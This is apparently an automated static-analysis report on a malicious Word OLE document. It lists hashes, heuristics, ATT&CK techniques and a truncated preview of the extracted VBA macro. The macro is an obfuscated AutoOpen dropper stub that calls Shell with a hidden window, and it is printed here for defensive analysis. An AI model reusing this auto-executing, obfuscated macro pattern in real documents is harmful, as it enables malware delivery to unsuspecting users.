Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67015b6b503b4514…

MALICIOUS

Office (OLE)

Size: 179.5 KB
Created: 2017-12-07 13:01:00
Authoring application: Microsoft Office Word
First seen: 2018-02-07
MD5: 34f31d352580fd0f7f0b279cd72004ce
SHA-1: ccf96ae96fa742439ca342d76524e3ec2afc063a
SHA-256: 67015b6b503b4514c4770957898747959cfaf122cd6e8805585aec0526e860fd
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The file contains a malicious VBA macro with an AutoOpen subroutine that calls the Shell function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The extracted URL `http://jAu+jAugjAu` is suspicious and may be related to payload delivery. The ClamAV detection `Img.Dropper.PhishingLure-6443153-0` further supports the malicious verdict.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    The VBA source calls the Shell() function.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen subroutine, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents, or documents whose source extraction failed, where no visible macro source is available.
  • OLE document has a large unaccounted-for region (severity: high; rule: OLE_SLACK_ANOMALY)
    The OLE file is 183,808 bytes but its declared streams total only 103,988 bytes; the remaining 79,820 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://jAu+jAugjAu (found in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34623 bytes
SHA-256: a2bcf12ef450eece1e6fa0455ed125cb60f925a18db241f25d3940ff88f6ab60

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "hmWNzfA"
Sub AutoOpen()
udJwaCbpSAHpKA = Array(UCase("oYUZFmoOQnUHVf" + "DWYZFHuQlfr" + "CkBMPRsupzdnKG" + "tKGuFKqzl" + "kvmuIjuNr"))
iObEpdllDtkP = Array(UCase("tBFikllLmQufVF" + "hQjaSVk" + "jCEcZFtshUz" + "sCFJcGZrwjYUXk" + "nJKwcJW"))
bjIMGsXNLY = Array(UCase("HiKazMws" + "CikFoAGiWXU" + "WjddTuSzaTNv" + "cacjMkjQ" + "TzvCXFmoqoDbl"))
hwdSdsFjRouMad = Array(UCase("KnnTjNfhRWMMlc" + "sjqcvmiRDX" + "kjGILfIpjAPH" + "jBOMwQj" + "GswKVwiMbV"))
vvdwbILhEwwX = Array(UCase("blsuXVVnrQd" + "JzqjadFffMJGC" + "EkibXKUUjjFno" + "AzDizKR" + "VBdSrszP"))
mrkRkEQtTUp = Array(UCase("GbmpzihIi" + "sVtPhwET" + "WTHSwDoQsnl" + "pbwOZqdrOPG" + "fzOYUXRpAtTuzI"))
VBA.Shell$ GroQSZEWTizL, 0
lLNpUtaCtwBIH = Array(UCase("bMHMJnwpPwV" + "vfwIBOQAsj" + "alDEzUb" + "PKOZjLhqV" + "wvRTzzvFlumrGi"))
LjbFizUndGKhGQ = Array(UCase("UYuGvlkGmGJrjh" + "XEfiUiGknuc" + "oNoQpooa" + "wznJbaozZ" + "kGwiGCbv"))
NoHMTdvsw = Array(UCase("TDvGSaEsVtERk" + "mrBrfhNNt" + "MZpnTffiqJ" + "EoziHCK" + "COvEtab"))
EMQcFJZuslR = Array(UCase("pOVbaHhCBM" + "fDHrHQVvMr" + "aVahzuP" + "mVllQns" + "dmsZbsolYz"))
SdXqEjmnz = Array(UCase("sImnwaC" + "RrDPvrJUScihoI" + "cwbPfhE" + "AsUkdFlfRmr" + "GPChfhjO"))
End Sub
Function XhjTwHsqFVhv()
FbAup = Array(UCase("VQILuJKvMcuuDQ" + "rKBLYsWFLjSDC" + "KvfMHQbm" + "rRzuSZBMjH" + "iFOaJGwKzbcGIn"), UCase("jOivzOE" + "JtawEjJXivGdE" + "EDBSQpuPLpGQ" + "nioIiZREjiIui" + "EtKCJwzJiuhzO"))
WuRFjiLSwS = Mid("NWXnEMczPmoDw   nlocFBAzlEHoLui", 14, 3)
NsvwkztJEv = Array(UCase("PFkYTDcpUipA" + "GIXAzwzKwzcW" + "ovSwOnBAHkjNoJ" + "IPLjkKHNRpHwz" + "SHICXOhWXP"), UCase("wjzYnnL" + "KChmsmljiBHHq" + "aocbLQu" + "lrvhlaIp" + "BwHmXlVQPlh"))
BsGWzsW = Array(UCase("uilrnnWtunXDnb" + "VtXmBqVAnz" + "tdztakLXKw" + "QGqRLzXiGJYlIB" + "KMDYhzuT"), UCase("stAMnsQRZYcRvk" + "WdJrKVsqsRZ" + "TlRwVnwYSwKqNt" + "LkYsPcY" + "DoDIYAC"))
YbRQddN = Array(UCase("RWVqAjLIQTtS" + "wMMjdcJOKaL" + "zbvEdTFuHZ" + "rNTTiSibj" + "VdCctmVYSGvKT"), UCase("IQDnAnX" + "YwVVJIavc" + "biiwtcjhkWpSUh" + "TLRPvawQCEGHYc" + "zWiwjkVJ"))
UPzZhC = Mid("PjALUntqtEqiXO", 10, 1)
vUpdTzp = Array(UCase("uNtwjIZH" + "wLMXSSdROjG" + "YKWuiNKRiY" + "PrPdUwaCKQ" + "QQMikVarK"), UCase("vnWCWBzvPp" + "anzjCpIVoivDKu" + "iEcormN" + "TDtawud" + "vbOpdPwh"))
CEcsXMvWAht = Array(UCase("bDTDBdFboa" + "zJjhYiScunUKE" + "YToYzKzCuo" + "HtOZwiTzlPoqw" + "ERtPkGsOfd"), UCase("RCqQsuOr" + "RlECvIBNTHjcr" + "tsEnKiw" + "NkPhcdhsUZwGG" + "NqTbFfvYu"))
fdTpmj = Array(UCase("tsHNZjlEz" + "WYmjjFpzohh" + "SUOOuGrc" + "KTDbQJSAQWkHh" + "YNHFXKMHiilZnw"), UCase("oiNWmMFj" + "TvXwYLzA" + "ZpBmBTSfCoUp" + "WTpbsWkuhTizl" + "mOiTlloNJJB"))
zHLKwaUPYww = Mid("sRaHHAoIz plDTKYvOfvTDwRHFrOZfBzz", 10, 1)
viNkbt = Array(UCase("ZBzXoHEJrYYT" + "OfYjamJiluZfO" + "icTzpqiHbf" + "ENVoOhuu" + "FwhzVlk"), UCase("nGXsZnV" + "YbicEGEsWVZo" + "XNilMOmvTcEGj" + "UIRfazHpGM" + "zzroczLwM"))
FOSSOkuXdd = Array(UCase("uEHJQOSdZEI" + "SaPqsWXnPrfQTV" + "DCIKjZPcfnYC" + "hIChFmAKV" + "VmlOMCYqpvfOaQ"), UCase("bXDwkDUUIGHpwL" + "UYhFnXuKCaGw" + "GjShmniOzMlt" + "RdIFNaf" + "bHjVcWhM"))
lJwYljD = Array(UCase("EdmHjVaJS" + "LZvDYfq" + "ZRjEOzkwEMt" + "DPzjcPH" + "fcdLpQGsYK"), UCase("AjUMDiz" + "nXjROPOww" + "MaJXTzznVPw" + "rXuLtUiDuAcAU" + "vLPwaRK"))
krKDK = Mid("TT  kmrNSRWazmZzNAOIRmkmimGwBJFcQVrrbh", 3, 2)
BszmWV = Array(UCase("XdGlNYn" + "CLhSWLwLlF" + "CzNjRaibl" + "JQwCzpIn" + "EEUfKPwpF"), UCase("kKrRQKDKzpLjzC" + "sukQZVnYV" + "MhRCQTl" + "iABSwjstfL" + "EUHSSSUOYjazmV"))
PYSGXV = Array(UCase("LjrcQXOPN" + "PufLWCWtPshL" + "IDTBmYZohibLKU" + "ELofmslaV" + "oNZhBRiAljZz"), UCase("crowiLDzMh" + "pEECYFW" + "wSzKzHfRsLY" + "rGpLnwwDORjb" + "TrzMjbjMvzD"))
XXPbCtwBA = Array(UCase("qiaGhSUEFTbs" + "kKqBRUn" + "VurjqZufi" + "AEdzjvw" + "PLYAYPSfz"), UCase("OJSznSUnjXqtZY" + "TaoblbvCzF" + "uVVbQLbzRZi" + "QLiwMbc" + "lzdFpiELTT"))
ZFIzh = Mid("XaiBYstNeHYjolZkDbRXiokOFzjwWjQNZcqpo", 9, 1)
IvXOfu = Array(UCase("jppCuLoowOi" + "tOaJTPhiV" + "jPiELksYvHm" + "HJHATFvnjEI" + "TRAWtjSUJBIZ"), UCase("qzDwXTacNH" + "CSvbmivbH" + "ltjVfOp" + "WFAhfdFsq" + "khFFKjUa"))
zTFDIT
... (truncated)